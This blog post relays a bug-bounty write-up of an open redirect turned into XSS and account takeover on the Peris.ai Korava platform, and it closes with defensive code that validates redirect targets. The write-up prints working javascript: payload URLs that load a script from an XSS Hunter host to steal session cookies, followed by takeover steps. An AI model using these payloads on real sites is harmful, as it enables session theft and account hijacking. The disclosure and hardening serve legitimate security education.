
How to Get 12 Million Rupiah in One Night (Open Redirect Lead to Account Takeover)

February 14, 2023
Attention all bug hunters! Have you ever come across a vulnerability in a private program and wanted to share your experience with the world? Well, one bug hunter, known by their nickname "rootbakar", has recently published an exciting tale of discovering a bug on the Peris.ai Korava Platform. This platform is part of Peris.ai Cybersecurity's offerings and aims to bring bug hunters and companies/organizations together through a transparent system, with bug reports verified by three different parties.

In this publication, rootbakar shares the details of their bug discovery in the login and registration features of the platform. The vulnerability allowed an attacker to steal a victim's cookie by exploiting an Open Redirect in the `redirect` parameter, which accepted a `javascript:` URL and therefore escalated into an XSS attack. The cookie was then sent to XSS Hunter through a payload injected into the vulnerable URL parameter.

The impact of this vulnerability could be an account takeover, for which rootbakar provides a proof of concept for both the login and registration features. The timeline of the discovery, reporting, and fixing of the bug is also detailed in the publication, as well as the rewards received.

This exciting publication is a must-read for all bug hunters and those interested in the inner workings of cybersecurity. So don't miss out on rootbakar's unique experience on the Peris.ai Korava Platform and gain valuable insights into the bug hunting world. The original publication can be found on https://progress28.com/2023/01/02/how-to-get-12-million-rupiah-in-one-night-open-redirect-lead-to-account-takeover/

Hi Bug Hunters!

In this article, I'd like to share my experience of finding a bug in a private program that I participated in on the Perisai Korava Platform. Before diving in, let me introduce myself - I go by the nickname "rootbakar."

So, let's get started...

SUMMARY:

I came across a bug in the login and registration feature of the platform.

Login & Register Feature:

This vulnerability enables an attacker to steal a cookie by exploiting the Open Redirect vulnerability in either the login or registration page, which can then be escalated into an XSS attack.

  • In the login feature, an unauthenticated user (not in a previous login state) can inject a payload into the vulnerable URL/parameter, specifically https://redacted/login?redirect={XSSHUNTER_PAYLOAD_HERE}.
  • In the registration feature, an authenticated user (already in a previous login state) can do the same by injecting the payload into https://redacted/register?redirect={XSSHUNTER_PAYLOAD_HERE}. The cookie is then sent to XSS Hunter.

In this case, I found a vulnerability in the login and registration feature. The vulnerability allows an attacker to steal a cookie from an unauthenticated user in the login page, which can be escalated into XSS, or from an authenticated user in the register page. The cookie is then sent to XSS Hunter through a payload that has been injected into the vulnerable URL or parameter. Additionally, I discovered a data leak in the form of a phone number that was obtained from the cookie.

The impact of this vulnerability is severe, as it can result in the takeover of a victim's account. I have provided a proof of concept for both the login and register feature, demonstrating how an attacker can use the vulnerability to gain access to a victim's account.

Here is the complete information about the Proof of Concept for the Login and Register Feature:

Login Feature:

  1. The attacker sends a malicious link to the victim in the form of a link https://redacted/login?redirect=javascript:eval(%27var%20a=document.createElement(\%27script\%27);a.src=\%27https://28.xss.ht\%27;document.body.appendChild(a)%27)
  2. The victim accesses the malicious link sent by the attacker
  3. The victim logs in using their account (using a phone number)
  4. When the victim successfully logs in, the attacker will receive information in the form of a cookie that is sent to their email (the result of the XSS Hunter)
  5. The attacker imports the cookie using a cookie-editor tool
  6. The attacker refreshes the browser and the attacker successfully logs in as the victim.

Register Feature:

  1. Login to account A (victim account)
  2. The attacker sends a malicious link to the victim in the form of https://redacted/register?redirect=javascript:eval(%27var%20a=document.createElement(\%27script\%27);a.src=\%27https://28.xss.ht\%27;document.body.appendChild(a)%27)
  3. The victim accesses the malicious link sent by the attacker
  4. The victim fills in their name and clicks "Next"
  5. The attacker receives information in the form of a cookie that is sent to their email (the result of the XSS Hunter)
  6. The attacker imports the cookie using a cookie-editor tool
  7. The attacker refreshes the browser and the attacker successfully logs in as the victim.

I reported this bug in December 2022 and the triage process was completed in the same month with a P3 severity rating. The fix for this vulnerability is currently in progress. I received the rewards for this report in December 2022.

I hope this article provides valuable insights and information for fellow bug hunters. If you have any questions or feedback, please let me know.

Sharing my experience, I hope this article will be helpful and inspiring to my fellow bug hunters. If you're curious about the Peris.ai Korava Platform, let me tell you about it. It's a part of the Peris.ai Cybersecurity offerings and its aim is to bring transparency to the bug hunting process by having three parties verify each bug report submitted by hunters. The rewards system is also unique, as 50% of the reward is given after the triage report and the remaining 50% after retesting.

For those who want to try the platform, you can access the login page here. If you'd like to know more, visit the Peris.ai Cybersecurity website.

That concludes this article. If there are any mistakes or areas for improvement, I welcome constructive criticism and input from my fellow bug hunters. Wishing everyone good health and prosperity.

Best regards,

rootbakar.
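
The root cause in the writeup above is a `redirect` parameter whose raw value reaches the browser's location, so a `javascript:` URL (or an off-site URL) is followed after login. The following is an added example, not code from rootbakar or from the Korava platform, showing the vulnerable pattern beside an allowlist check that only lets same-origin http(s) paths through; the site origin `https://app.example` and the sample inputs are constructed.

```javascript
// Added example: validating a post-login ?redirect= parameter.
// Assumption: the application lives at SITE_ORIGIN (constructed value).
const SITE_ORIGIN = "https://app.example";
const DEFAULT_TARGET = "/";

// Vulnerable pattern described in the writeup: the raw query value is used as-is,
// so "javascript:" schemes and other hosts reach window.location unchecked.
function vulnerableRedirectTarget(raw) {
  return raw || DEFAULT_TARGET;
}

// Hardened version: only same-origin http(s) targets survive; anything else
// (javascript:, data:, protocol-relative //host, other origins, garbage)
// collapses to DEFAULT_TARGET.
function safeRedirectTarget(raw, origin = SITE_ORIGIN) {
  if (typeof raw !== "string" || raw.length === 0) return DEFAULT_TARGET;
  let url;
  try {
    // Resolving against the site origin turns "/dashboard" into an absolute URL,
    // while "//evil.example/x" and "javascript:..." keep their own host/scheme.
    url = new URL(raw, origin);
  } catch (e) {
    return DEFAULT_TARGET; // unparsable input
  }
  if (url.protocol !== "https:" && url.protocol !== "http:") return DEFAULT_TARGET;
  if (url.origin !== new URL(origin).origin) return DEFAULT_TARGET;
  // Re-serialise only path + query + fragment so the result is always relative.
  return url.pathname + url.search + url.hash;
}

// Runs the same inputs through both functions so the difference is visible.
function compare(inputs) {
  return inputs.map((raw) => ({
    raw,
    vulnerable: vulnerableRedirectTarget(raw),
    safe: safeRedirectTarget(raw),
  }));
}

// Constructed sample inputs modelled on the ?redirect= parameter in the writeup.
const SAMPLE_INPUTS = [
  "/dashboard?tab=reports",
  "javascript:eval('/* attacker script loader */')",
  "//evil.example/phish",
  "https://evil.example/phish",
  "https://app.example/settings#profile",
  "",
];

for (const row of compare(SAMPLE_INPUTS)) console.log(row);
```

Marking the session cookie `HttpOnly` is a complementary control: even if a redirect check is missing, injected script cannot read the cookie through `document.cookie`.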

As we come to the end of this insightful article on the Perisai Korava Platform, we hope that our readers have gained a better understanding of the intricacies of bug hunting and the impact of a well-executed proof of concept. This publication has served as a testament to the tireless efforts of bug hunters, who work day in and day out to ensure the security of various online platforms.

We would like to extend our gratitude to rootbakar for sharing their experience with us and giving us a glimpse into the exciting world of bug hunting. This article has truly shed light on the importance of transparency and fairness in the bug bounty industry, and how platforms like Perisai Korava are making a difference.

We hope that this article has inspired and motivated our readers to take an active interest in bug hunting and to join the effort in making the digital world a safer place. Thank you for reading and we look forward to your next visit.
